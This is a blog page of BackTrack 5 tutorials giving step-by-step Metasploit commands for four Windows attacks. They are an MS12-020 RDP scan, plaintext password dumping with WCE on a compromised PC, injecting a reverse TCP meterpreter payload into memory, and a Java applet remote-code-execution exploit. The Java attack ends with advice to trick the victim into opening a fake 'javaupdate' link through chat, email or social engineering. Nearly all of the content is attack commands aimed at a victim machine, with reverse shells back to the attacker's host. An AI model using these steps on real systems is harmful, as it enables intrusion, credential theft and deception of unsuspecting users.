Raj Chandel's Blog
BackTrack 5 Tutorials
How to Check Enabled Remote Desktop Service in Network with Metasploit
23 months ago
This module checks a range of hosts for the MS12-020 vulnerability. This does not cause a DoS on the target.
Exploit Targets
Windows PC
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use auxiliary/scanner/rdp/ms12-020_check
msf exploit (ms12-020_check)>set rhosts 192.168.1.1/24 (Target Host Range)
msf exploit (ms12-020_check)>set thread 1
msf exploit (ms12-020_check)>exploit
Hack Remote Windows Passwords in Plain Text with WCE
03 months ago
Windows Credentials Editor (WCE) is a security tool that allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7 and 2008.
First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)
Step 1: Now upload the wce.exe in victim pc using
Upload /pentest/passwords/wce/wce.exe .
Step 2: type shell to get the command prompt of victim pc
Step 3: now use wce.exe –w command to get password in text form
Windows Manage Memory Payload Injection
03 months ago
This module will inject a payload into memory of a process. If a payload isn’t selected, then it’ll default to a reverse x86 TCP meterpreter. If the PID datastore option isn’t specified, then it’ll inject into notepad.exe instead.
Exploit Targets
Windows PC
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/windows/local/payload_inject
msf exploit (payload_inject)>set payload windows/meterpreter/reverse_tcp
msf exploit (payload_inject)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (payload_inject)>set session 1
msf exploit (payload_inject)>exploit
Attacking on Windows, Linux or MAC PC using Java Applet Method Handle Remote Code Execution
03 months ago
This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.
Exploit Targets
Java 7 Update 7
Windows PC
Linux PC
MAC OS X PC
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/java_jre17_method_handle
msf exploit (java_jre17_method_handle)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_method_handle)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (java_jre17_method_handle)>set srvhost 192.168.1.3 (This must be an address on the local machine)
msf exploit (java_jre17_method_handle)>set uripath javaupdate (The Url to use for this exploit)
msf exploit (java_jre17_method_handle)>exploit
Now an URL you should give to your victim http://192.168.1.3:8080/javaupdate
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
